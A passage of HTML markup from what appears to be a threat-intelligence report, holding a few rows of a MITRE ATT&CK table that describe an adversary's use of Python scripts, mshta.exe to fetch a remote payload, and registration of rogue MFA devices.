vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"></span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1132570042" paraeid="{fe8f1781-2fcc-46f1-a94d-3df5b373ac95}{207}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1059.006: Command and Scripting Interpreter: Python</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="193515998" paraeid="{fe8f1781-2fcc-46f1-a94d-3df5b373ac95}{214}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">The adversary used automated Python scripts to interact with the environment.</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1750131552" paraeid="{fe8f1781-2fcc-46f1-a94d-3df5b373ac95}{221}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">1</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="13" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" xml:lang="EN-US" lang="EN-US" paraid="1545424520" paraeid="{09772ea6-c54d-4dc0-bb20-bb5c3a18251a}{224}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"></span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1524586270" paraeid="{fe8f1781-2fcc-46f1-a94d-3df5b373ac95}{229}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1059.005: Command and Scripting Interpreter: MSHTA</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1389414149" paraeid="{fe8f1781-2fcc-46f1-a94d-3df5b373ac95}{236}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">The adversary<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">attempted</span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"><span class="Apple-converted-space">&#xA0;</span>to use mshta.exe to retrieve and execute a remote malicious payload from an external URL.</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1028459346" paraeid="{fe8f1781-2fcc-46f1-a94d-3df5b373ac95}{243}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">1</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="14" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="118717670" paraeid="{c57978b9-7f21-4157-9452-dbe95c1d95cc}{116}" style="-webkit-user-drag: none; margin: 19.2px 0px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: bold; font-style: normal; vertical-align: baseline; background-color: transparent; color: rgb(255, 255, 255); text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-weight: bold; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Header" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Persistence</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;335559738&quot;:288}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="194567616" paraeid="{a86f9c39-020b-46a6-a896-d486e6ba6419}{18}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1556.006:<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Modify</span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Authentication Process: Multi-Factor Authentication</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="379573351" paraeid="{a86f9c39-020b-46a6-a896-d486e6ba6419}{25}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">The adversary registered their own malicious MFA devices to<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">maintain</span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"><span class="Apple-converted-space">&#xA0;</span>access to compromised accounts.</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1192236535" paraeid="{a86f9c39-020b-46a6-a896-d486e6ba6419}{32}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">2</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="15" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" xml:lang="EN-US" lang="EN-US" paraid="1757169166" paraeid="{09772ea6-c54d-4dc0-bb20-bb5c3a18251a}{236}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"></span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; 